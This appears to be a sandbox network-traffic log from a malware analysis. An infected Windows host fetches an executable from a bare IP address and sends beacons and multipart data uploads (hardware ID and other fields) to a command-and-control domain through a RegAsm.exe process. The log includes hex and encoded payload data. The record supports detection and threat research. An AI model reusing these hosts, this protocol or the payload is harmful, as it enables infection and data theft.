Dec 12, 2024 17:33:56.857063055 CET	1289	IN	Data Raw: 62 00 45 00 6c 00 49 00 52 00 47 00 78 00 4e 00 55 00 31 00 70 00 34 00 57 00 6c 00 52 00 52 00 62 00 46 00 46 00 4f 00 52 00 46 00 5a 00 77 00 56 00 6c 00 5a 00 42 00 5a 00 46 00 68 00 43 00 62 00 6e 00 4e 00 49 00 52 00 44 00 46 00 72 00 53 00 Data Ascii: bElIRGxNU1p4WlRRbFFORFZwVlZBZFhCbnNIRDFrSGZ5WlREbE1GQTBJUUxpdFlGbVlXRUJZRmRBMVZCMFVSVGhZY2FCWVdBRmNSQjNjUlloQlRFVVZPUWtRUV
Dec 12, 2024 17:33:56.857072115 CET	1289	IN	Data Raw: 00 57 00 77 00 34 00 59 00 6d 00 4a 00 6e 00 5a 00 45 00 56 00 44 00 4d 00 45 00 6c 00 78 00 51 00 54 00 46 00 6e 00 55 00 6d 00 46 00 6e 00 5a 00 45 00 5a 00 55 00 61 00 46 00 6c 00 59 00 51 00 7a 00 46 00 6e 00 51 00 6b 00 70 00 6e 00 52 00 6b Data Ascii: Ww4YmJnZEVDMElxQTFnUmFnZEZUaFlYQzFnQkpnRkVCMWNXQzFrYlFBNVhCVVZPUW44YmNqSkNFQllIREVBY2RBMVlEMU1NRmhwVmRSWkVDMWdGUWxVQWRCQl
Dec 12, 2024 17:33:57.074033976 CET	1289	IN	Data Raw: 45 00 31 00 71 00 57 00 6d 00 56 00 46 00 52 00 6b 00 31 00 45 00 51 00 6d 00 35 00 56 00 59 00 57 00 46 00 43 00 57 00 6c 00 52 00 48 00 61 00 30 00 70 00 44 00 57 00 48 00 68 00 5a 00 4e 00 57 00 46 00 52 00 54 00 6c 00 4e 00 4a 00 4d 00 46 00 Data Ascii: E1qWmVFRk1EQm5VYWFCWlRHa0pDWHhZNWFRTlNJMFlMWG1VUWNqVlpGUUJXTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUU9FcHhCMElqRWw4N1p3OVRFUjV
Dec 12, 2024 17:33:57.329849005 CET	155	OUT	GET /infopage/ilk.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131
Dec 12, 2024 17:33:57.549443007 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 16:33:57 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 12 Dec 2024 14:31:40 GMT ETag: "47e00-6291392989375" Accept-Ranges: bytes Content-Length: 294400 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 62 fe 59 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 03 00 00 ae 00 00 00 00 00 00 90 87 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e1 fb 03 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 dc 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c fd [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELbYg@`@ 9,.text `.rdata "@@.dataP@.CRTB@@.reloc9 :D@B [TRUNCATED]

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49711	172.67.207.38	443	1848	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 16:33:59 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-12 16:33:59 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-12 16:34:00 UTC	1017	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 16:33:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e7l6fqmv0p5rackpa4mg7fjmbs; expires=Mon, 07-Apr-2025 10:20:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3y8hCx6YkSscsIEAegeOHPOp8PvrWIHJN7DpDdQ%2Bz65BvNUMy9UFIRcQfy9FUov8bygjSvKjaq%2FwBnclr27AcKKxMBeC0lSFU%2BmaJwho%2BdrUYmFww7KFNMAbdyXilAUVpfM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0f1e8a1b6212f1-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=114064&min_rtt=114033&rtt_var=24076&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=33589&cwnd=252&unsent_bytes=0&cid=b1f796caf7dc2566&ts=884&x=0"
2024-12-12 16:34:00 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-12 16:34:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49712	172.67.207.38	443	1848	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 16:34:00 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 48 Host: immureprech.biz
2024-12-12 16:34:00 UTC	48	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 55 6b 67 4c 76 2d 2d 45 42 41 4c 41 59 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=DUkgLv--EBALAY&j=
2024-12-12 16:34:00 UTC	1019	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 16:34:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3847huvv53tf2h5tggr2rqneb7; expires=Mon, 07-Apr-2025 10:20:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bUbDyYWKjZjdR5qX1WOSEutwI3dFsGTKmYnuwt4S9TklP4eMjh4M%2FcSww6wZCMfaT8HUhpj6496zfuhDL%2FmoaMn2s3QwRVMXr%2F%2FVEaQl4InZAVriXuuqLci8Dv9P9qKk%2Br0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0f1e918d42b0b1-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=113890&min_rtt=113860&rtt_var=24066&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=947&delivery_rate=33613&cwnd=252&unsent_bytes=0&cid=20a60c0b043fb9c9&ts=594&x=0"
2024-12-12 16:34:00 UTC	350	IN	Data Raw: 34 65 31 0d 0a 4c 42 37 55 35 61 7a 74 71 55 55 61 34 4d 50 71 38 72 62 48 61 62 43 31 71 6e 51 36 34 78 4c 79 78 39 66 63 63 6d 35 4c 51 5a 4a 58 50 4b 4c 48 6c 74 6d 46 5a 32 6d 46 34 64 43 47 78 4c 49 4d 6e 4a 66 4c 45 42 6a 5a 64 4a 4f 72 70 4c 6c 65 54 44 30 73 73 42 5a 34 74 59 6e 66 69 49 56 6e 66 35 6a 68 30 4b 6e 4e 35 51 7a 65 6c 35 42 57 58 34 6c 77 6b 36 75 31 76 52 6b 42 4f 79 33 78 52 48 4b 7a 6a 63 6d 4f 7a 53 52 32 6a 61 61 50 6c 39 65 74 42 39 6e 59 77 68 6b 59 7a 7a 43 58 76 66 58 6d 55 43 4d 75 4e 66 4e 68 66 36 65 4f 6a 70 43 46 50 6a 69 46 72 63 6a 49 6c 4b 59 4d 30 74 6e 4d 45 46 47 4c 65 70 71 6a 74 4c 67 59 48 69 49 6e 2b 6b 52 38 73 49 7a 44 68 39 6b 70 66 49 71 74 69 5a 33 58 35 55 57 53 30 4e 42 57 41 4d 45 6a 6f 71 61 6b 72 77 Data Ascii: 4e1LB7U5aztqUUa4MPq8rbHabC1qnQ64xLyx9fccm5LQZJXPKLHltmFZ2mF4dCGxLIMnJfLEBjZdJOrpLleTD0ssBZ4tYnfiIVnf5jh0KnN5Qzel5BWX4lwk6u1vRkBOy3xRHKzjcmOzSR2jaaPl9etB9nYwhkYzzCXvfXmUCMuNfNhf6eOjpCFPjiFrcjIlKYM0tnMEFGLepqjtLgYHiIn+kR8sIzDh9kpfIqtiZ3X5UWS0NBWAMEjoqakrw
2024-12-12 16:34:00 UTC	906	IN	Data Raw: 49 6e 50 67 73 73 31 63 49 6d 71 6a 59 4c 66 72 41 62 66 31 38 55 63 56 34 4a 77 6c 36 2b 2f 73 52 6f 49 4a 43 37 32 54 6e 7a 32 79 59 36 49 30 32 63 67 77 6f 4b 4e 67 4e 4f 70 48 5a 44 74 69 41 6b 57 6d 44 43 58 71 66 58 6d 55 41 51 73 49 50 4e 46 63 37 57 50 78 5a 33 4c 4e 58 36 50 70 4a 71 57 30 61 73 42 30 63 58 43 47 46 36 43 65 5a 75 73 73 4c 6b 55 54 47 64 6a 39 31 59 38 37 73 66 76 67 73 41 72 63 70 57 68 79 49 2b 61 76 45 76 56 32 34 68 4f 47 49 56 78 6c 4b 53 78 73 42 34 49 4a 53 58 2b 51 33 4f 77 6a 63 36 49 77 53 39 77 67 36 79 44 6e 39 53 67 42 74 62 52 78 42 64 64 77 54 37 51 6f 71 33 2b 53 45 77 48 4a 50 4e 63 50 6f 4f 45 77 49 48 4d 4d 54 69 64 37 35 48 51 30 36 6c 4c 69 70 66 47 45 31 65 54 63 59 4b 67 75 36 77 63 43 53 38 75 38 30 42 38 Data Ascii: InPgss1cImqjYLfrAbf18UcV4Jwl6+/sRoIJC72Tnz2yY6I02cgwoKNgNOpHZDtiAkWmDCXqfXmUAQsIPNFc7WPxZ3LNX6PpJqW0asB0cXCGF6CeZussLkUTGdj91Y87sfvgsArcpWhyI+avEvV24hOGIVxlKSxsB4IJSX+Q3Owjc6IwS9wg6yDn9SgBtbRxBddwT7Qoq3+SEwHJPNcPoOEwIHMMTid75HQ06lLipfGE1eTcYKgu6wcCS8u80B8
2024-12-12 16:34:00 UTC	1369	IN	Data Raw: 34 34 33 62 0d 0a 6f 71 70 69 4a 33 56 72 67 50 55 32 73 4d 5a 56 34 5a 34 6b 36 6d 77 73 78 4e 4d 5a 32 50 33 56 6a 7a 75 78 2b 75 42 79 44 5a 70 77 4a 53 4c 6e 74 71 69 48 5a 4c 49 68 67 38 59 68 6e 7a 51 2f 66 57 30 46 77 73 74 4c 76 70 4e 65 4c 4b 4b 77 59 62 43 4c 6d 71 49 72 59 61 43 32 61 38 4f 33 4e 76 4e 47 56 69 41 63 5a 36 76 76 76 35 65 54 43 34 37 73 42 59 38 6d 59 72 65 6e 63 45 73 61 63 43 55 69 35 37 61 6f 68 32 53 79 49 59 50 47 49 5a 38 30 50 33 31 74 52 59 41 4a 53 50 32 58 48 4b 35 6c 63 53 64 7a 79 6c 38 6a 71 2b 42 6e 64 75 67 47 64 62 58 32 68 64 64 68 6e 36 64 74 37 44 2b 58 6b 77 75 4f 37 41 57 50 49 79 7a 79 5a 2f 61 49 44 71 33 6f 6f 61 65 30 37 4e 4c 7a 5a 6e 52 56 6c 2b 4e 4d 4d 6a 6c 74 72 49 64 42 53 77 73 34 6b 52 77 74 35 Data Ascii: 443boqpiJ3VrgPU2sMZV4Z4k6mwsxNMZ2P3Vjzux+uByDZpwJSLntqiHZLIhg8YhnzQ/fW0FwstLvpNeLKKwYbCLmqIrYaC2a8O3NvNGViAcZ6vvv5eTC47sBY8mYrencEsacCUi57aoh2SyIYPGIZ80P31tRYAJSP2XHK5lcSdzyl8jq+BndugGdbX2hddhn6dt7D+XkwuO7AWPIyzyZ/aIDq3ooae07NLzZnRVl+NMMjltrIdBSws4kRwt5
2024-12-12 16:34:00 UTC	1369	IN	Data Raw: 4b 58 79 49 70 49 79 63 33 71 55 4f 77 4e 2f 4f 45 56 53 4a 64 5a 2b 6a 73 4c 4d 58 42 79 6f 78 34 6b 31 34 75 49 75 4f 77 59 73 67 59 4d 4c 35 79 4c 58 44 70 68 76 55 31 49 67 4a 46 70 67 77 6c 36 6e 31 35 6c 41 4d 4a 79 2f 37 53 58 65 39 67 38 71 50 78 69 78 32 6a 4b 69 45 6d 4e 69 69 47 64 2f 53 77 42 78 52 68 48 79 64 70 71 65 39 45 55 78 6e 59 2f 64 57 50 4f 37 48 36 62 7a 38 42 44 69 64 37 35 48 51 30 36 6c 4c 69 70 66 4a 48 6c 2b 50 64 49 4b 72 70 37 41 58 44 43 38 72 2b 45 6c 77 75 49 6e 63 68 38 6f 6e 64 6f 32 70 67 5a 54 56 6f 51 2f 65 30 49 68 59 47 49 5a 6f 30 50 33 31 6c 68 4d 57 4d 32 48 65 52 58 79 78 6c 39 69 55 69 7a 67 32 6d 2b 47 50 6e 4a 54 39 53 39 62 63 77 68 39 62 69 48 53 64 70 62 79 78 47 51 51 6b 4b 2b 4a 50 64 71 53 44 79 34 37 Data Ascii: KXyIpIyc3qUOwN/OEVSJdZ+jsLMXByox4k14uIuOwYsgYML5yLXDphvU1IgJFpgwl6n15lAMJy/7SXe9g8qPxix2jKiEmNiiGd/SwBxRhHydpqe9EUxnY/dWPO7H6bz8BDid75HQ06lLipfJHl+PdIKrp7AXDC8r+ElwuInch8ondo2pgZTVoQ/e0IhYGIZo0P31lhMWM2HeRXyxl9iUizg2m+GPnJT9S9bcwh9biHSdpbyxGQQkK+JPdqSDy47
2024-12-12 16:34:00 UTC	1369	IN	Data Raw: 61 6d 46 6b 39 79 33 43 39 2f 58 32 67 52 65 69 6e 37 51 36 2f 57 35 43 45 78 78 59 38 46 5a 64 2f 61 59 67 4a 61 4c 49 48 54 43 2b 63 69 54 33 71 67 46 77 4e 50 4f 48 56 75 50 65 4a 57 74 73 62 51 64 41 79 49 70 2b 55 5a 38 75 59 4c 47 68 4d 30 70 65 59 53 74 68 64 43 61 35 51 7a 4b 6c 35 42 57 66 35 74 39 6c 72 4b 6b 69 78 63 4d 65 47 50 76 41 47 58 32 67 4d 4c 50 6b 32 64 31 6a 71 75 46 6c 64 43 74 44 4e 48 57 78 42 4a 56 6a 48 53 5a 6f 62 43 73 41 67 6f 6e 49 2f 39 41 63 37 71 56 77 49 72 4c 4b 7a 6a 4d 34 59 2b 49 6c 50 31 4c 34 38 44 49 56 6b 66 50 61 64 43 69 75 66 35 49 54 43 59 75 34 6b 4a 7a 74 6f 62 4e 69 38 41 67 66 6f 53 67 69 35 58 58 6f 41 33 54 31 38 51 63 58 34 6c 36 6e 71 69 7a 75 68 59 4b 61 57 32 77 53 57 54 32 33 34 36 39 78 69 6c 78 Data Ascii: amFk9y3C9/X2gRein7Q6/W5CExxY8FZd/aYgJaLIHTC+ciT3qgFwNPOHVuPeJWtsbQdAyIp+UZ8uYLGhM0peYSthdCa5QzKl5BWf5t9lrKkixcMeGPvAGX2gMLPk2d1jquFldCtDNHWxBJVjHSZobCsAgonI/9Ac7qVwIrLKzjM4Y+IlP1L48DIVkfPadCiuf5ITCYu4kJztobNi8AgfoSgi5XXoA3T18QcX4l6nqizuhYKaW2wSWT23469xilx
2024-12-12 16:34:00 UTC	1369	IN	Data Raw: 2f 54 72 51 54 57 31 38 64 57 46 73 46 33 69 4f 58 74 2f 6a 41 48 50 77 4c 2b 52 57 37 32 6d 49 43 57 69 79 42 30 77 76 6e 49 6e 74 32 6b 41 39 7a 62 77 42 4a 4b 67 58 75 5a 71 72 53 78 45 41 38 6f 4b 66 68 63 65 72 61 4d 78 6f 6a 44 49 33 61 51 6f 49 66 51 6d 75 55 4d 79 70 65 51 56 6d 6d 58 64 35 65 71 39 35 63 58 46 79 67 70 38 30 56 77 39 70 69 41 6c 6f 73 67 64 4d 4c 35 79 4a 33 59 71 41 2f 41 32 38 67 57 55 59 5a 36 67 71 71 36 73 78 4d 4d 4c 44 48 78 58 48 4f 39 67 73 32 4c 78 43 68 30 69 71 76 49 33 70 53 69 45 35 4b 50 69 44 70 62 6b 48 72 53 67 71 2b 6f 46 77 41 34 4b 50 31 43 50 4b 6e 4a 31 38 2f 4d 4b 7a 6a 61 34 59 69 52 32 62 63 4f 30 39 33 43 47 31 43 4f 64 5a 57 71 73 62 6f 62 41 6a 73 74 2f 30 35 36 76 59 62 4c 6a 4d 41 74 64 6f 75 7a 79 Data Ascii: /TrQTW18dWFsF3iOXt/jAHPwL+RW72mICWiyB0wvnInt2kA9zbwBJKgXuZqrSxEA8oKfhceraMxojDI3aQoIfQmuUMypeQVmmXd5eq95cXFygp80Vw9piAlosgdML5yJ3YqA/A28gWUYZ6gqq6sxMMLDHxXHO9gs2LxCh0iqvI3pSiE5KPiDpbkHrSgq+oFwA4KP1CPKnJ18/MKzja4YiR2bcO093CG1COdZWqsbobAjst/056vYbLjMAtdouzy
2024-12-12 16:34:00 UTC	1369	IN	Data Raw: 44 30 64 4c 4e 48 46 53 4e 63 5a 69 73 76 37 73 56 43 69 4d 67 2f 6b 46 39 75 6f 50 48 67 63 4a 6e 4e 73 4b 6d 6b 4e 43 4d 35 54 33 43 30 4e 41 62 53 4d 4e 43 6b 37 53 6b 71 78 30 63 4c 32 48 66 54 58 43 31 67 73 6d 66 69 7a 67 32 6d 2b 47 50 6e 4a 54 39 53 39 4c 54 78 42 56 66 6a 33 2b 64 71 72 4b 31 48 77 59 6e 4d 66 39 4c 64 4c 71 50 77 35 33 42 4c 57 71 4c 71 49 57 65 33 4c 63 49 6b 70 6d 49 45 55 44 42 4b 4e 43 58 76 37 30 63 47 69 51 73 73 46 45 79 72 38 66 4a 67 34 74 2f 4f 4a 43 7a 69 4a 76 55 6f 67 58 41 31 73 41 5a 55 6f 46 32 6d 36 2b 32 74 78 51 43 49 43 58 78 51 33 32 33 68 38 75 50 77 6a 56 31 77 75 2f 49 6c 38 7a 6c 55 35 4c 67 78 42 31 70 67 6d 62 51 75 76 75 6e 55 41 73 6c 59 36 67 4f 66 61 53 4b 78 6f 76 4c 4b 6e 36 4a 6f 49 6d 54 31 4b Data Ascii: D0dLNHFSNcZisv7sVCiMg/kF9uoPHgcJnNsKmkNCM5T3C0NAbSMNCk7Skqx0cL2HfTXC1gsmfizg2m+GPnJT9S9LTxBVfj3+dqrK1HwYnMf9LdLqPw53BLWqLqIWe3LcIkpmIEUDBKNCXv70cGiQssFEyr8fJg4t/OJCziJvUogXA1sAZUoF2m6+2txQCICXxQ323h8uPwjV1wu/Il8zlU5LgxB1pgmbQuvunUAslY6gOfaSKxovLKn6JoImT1K
2024-12-12 16:34:00 UTC	1369	IN	Data Raw: 6b 46 59 66 67 6d 4b 43 6f 37 61 6f 45 30 73 58 48 64 42 46 61 72 65 4b 78 59 50 31 47 57 32 42 72 34 61 58 77 72 52 4c 6e 4a 66 48 56 67 43 34 4d 4e 6a 6c 69 76 42 51 46 47 6c 37 73 48 74 2f 75 49 6e 4a 6d 64 70 71 57 49 6d 33 69 5a 33 66 71 55 6e 54 32 74 67 52 47 4d 38 77 6c 75 58 74 37 6c 35 4d 4c 54 4b 77 46 69 7a 6b 33 4a 76 63 6e 48 63 71 6e 65 2b 52 30 4d 4c 6c 55 34 43 5a 69 41 51 59 32 54 44 58 70 71 65 73 46 67 38 2f 49 4c 64 77 51 70 61 4d 77 6f 7a 48 4a 6e 2f 43 37 38 69 66 6c 50 30 79 6b 74 54 61 42 42 65 51 5a 70 32 31 73 76 49 59 48 53 51 76 73 41 41 38 2b 6f 50 46 67 38 34 67 61 4d 32 7a 6d 4a 76 59 73 30 66 57 78 59 68 59 47 4a 42 37 6e 37 65 37 75 56 38 64 50 79 37 67 54 58 6d 78 79 38 61 65 78 69 73 34 7a 4f 47 64 6d 39 69 6a 42 73 65 Data Ascii: kFYfgmKCo7aoE0sXHdBFareKxYP1GW2Br4aXwrRLnJfHVgC4MNjlivBQFGl7sHt/uInJmdpqWIm3iZ3fqUnT2tgRGM8wluXt7l5MLTKwFizk3JvcnHcqne+R0MLlU4CZiAQY2TDXpqesFg8/ILdwQpaMwozHJn/C78iflP0yktTaBBeQZp21svIYHSQvsAA8+oPFg84gaM2zmJvYs0fWxYhYGJB7n7e7uV8dPy7gTXmxy8aexis4zOGdm9ijBse
2024-12-12 16:34:00 UTC	1369	IN	Data Raw: 4d 31 68 67 36 75 2b 71 42 64 4d 46 6d 32 77 56 6a 7a 75 78 2f 75 4d 78 53 6c 2f 6c 4c 44 46 74 74 65 69 44 64 48 5a 33 77 63 59 7a 7a 43 57 35 65 33 73 58 6b 77 74 4d 72 41 57 4c 4f 54 63 6d 39 79 63 64 79 71 64 37 35 48 51 77 75 56 54 67 5a 6d 49 42 42 6a 5a 4d 4e 65 72 75 4c 38 54 41 69 6f 78 34 6b 68 2f 6f 49 53 4a 73 66 55 43 64 59 2b 6b 68 70 66 71 6d 79 72 59 78 38 55 5a 58 37 39 4f 70 37 53 79 72 6c 49 71 4b 6a 58 7a 44 6a 4c 32 6e 34 37 58 69 77 5a 79 6b 71 79 48 6c 35 54 72 53 39 61 58 6b 46 5a 39 6a 48 32 56 71 37 4c 38 4d 51 59 35 4c 76 39 4a 50 50 6a 48 77 73 2b 54 5a 33 6d 49 73 59 57 66 30 2b 6b 4d 79 4e 43 49 57 42 69 50 4d 4d 6a 6c 74 4c 51 41 41 53 59 6b 76 45 68 79 75 4d 66 52 77 64 4a 6e 62 73 4c 35 32 39 36 55 74 30 75 4b 6c 34 38 59 Data Ascii: M1hg6u+qBdMFm2wVjzux/uMxSl/lLDFtteiDdHZ3wcYzzCW5e3sXkwtMrAWLOTcm9ycdyqd75HQwuVTgZmIBBjZMNeruL8TAiox4kh/oISJsfUCdY+khpfqmyrYx8UZX79Op7SyrlIqKjXzDjL2n47XiwZykqyHl5TrS9aXkFZ9jH2Vq7L8MQY5Lv9JPPjHws+TZ3mIsYWf0+kMyNCIWBiPMMjltLQAASYkvEhyuMfRwdJnbsL5296Ut0uKl48Y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49713	172.67.207.38	443	1848	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 16:34:01 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QP2EQTZBZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20488 Host: immureprech.biz
2024-12-12 16:34:01 UTC	15331	OUT	Data Raw: 2d 2d 51 50 32 45 51 54 5a 42 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 45 34 41 34 35 44 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 51 50 32 45 51 54 5a 42 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 50 32 45 51 54 5a 42 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 45 42 41 4c 41 59 0d 0a 2d 2d 51 50 32 45 51 54 5a 42 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 Data Ascii: --QP2EQTZBZContent-Disposition: form-data; name="hwid"ABE4A45DB129FD4CDB71E32F12885CB3--QP2EQTZBZContent-Disposition: form-data; name="pid"2--QP2EQTZBZContent-Disposition: form-data; name="lid"DUkgLv--EBALAY--QP2EQTZBZContent-Dis
2024-12-12 16:34:01 UTC	5157	OUT	Data Raw: c6 af b2 d2 c3 4f 74 3a 9a 3a 3e 33 de c8 f0 99 53 73 e3 e7 d9 70 93 b2 13 ce 1d 3b 9b 5e 5e 9e 53 4e a6 e7 ce 56 87 79 72 93 81 b7 6e 36 61 76 88 9f 71 a0 bf ad 5a e8 36 1a 36 a9 1b 99 b3 79 00 7b 16 0a ba e5 b4 8f 87 af 4d 07 78 8e 3e e3 6b 95 4c 36 90 92 a9 a3 b1 52 49 d4 c6 23 b1 70 7e 3e 15 79 ec fc dc fc 62 64 45 bb 1c f1 86 96 72 41 c9 46 b4 b8 9a 8c 11 92 62 dd b1 64 82 ad 90 34 9b 76 8b b2 49 b7 4c 5c c9 c6 b2 b1 c8 f6 e1 e8 f4 71 db aa 55 97 58 ad 90 63 47 1c 3f c6 0a dd 19 e2 96 73 6f ea 49 c6 67 1f b5 d8 a8 84 8f 5d 59 a2 38 35 93 df 86 77 ae 5c 97 c8 33 35 b7 7c 86 b0 7e 5e 8e 0d 4a b3 b1 4c 2a ad a4 f3 85 38 ab 73 0a 29 76 ee 2c 51 b3 f1 44 56 a5 4a ba 98 49 25 e2 e9 44 42 8d 26 c6 d9 ac 64 8e ef 5e 1e e4 b9 70 b6 95 80 8d 93 b6 25 df 2a 2d Data Ascii: Ot::>3Ssp;^^SNVyrn6avqZ66y{Mx>kL6RI#p~>ybdErAFbd4vIL\qUXcG?soIg]Y85w\35\|~^JL8s)v,QDVJI%DB&d^p%-
2024-12-12 16:34:01 UTC	1017	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 16:34:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a8lku48o2obusmn4f3dc391bpb; expires=Mon, 07-Apr-2025 10:20:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SyAvn0F0%2FxKg3PJrlWrmu86jgNO87MjkjhdxwBrXKBMXRGcPOMFZUNpEp0If%2BPLPpHckNNmgwG2BCmmycR0Li8fpkfy0HfLRBEHXAHDx7YCBIk8uEWhbwaPErB3gMH823gg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0f1e95ebb04587-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=113985&min_rtt=113826&rtt_var=24252&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21440&delivery_rate=33510&cwnd=252&unsent_bytes=0&cid=9bb8681d7ae26055&ts=609&x=0"
2024-12-12 16:34:01 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 35 0d 0a Data Ascii: 11ok 89.187.171.165
2024-12-12 16:34:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49714	172.67.207.38	443	1848	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
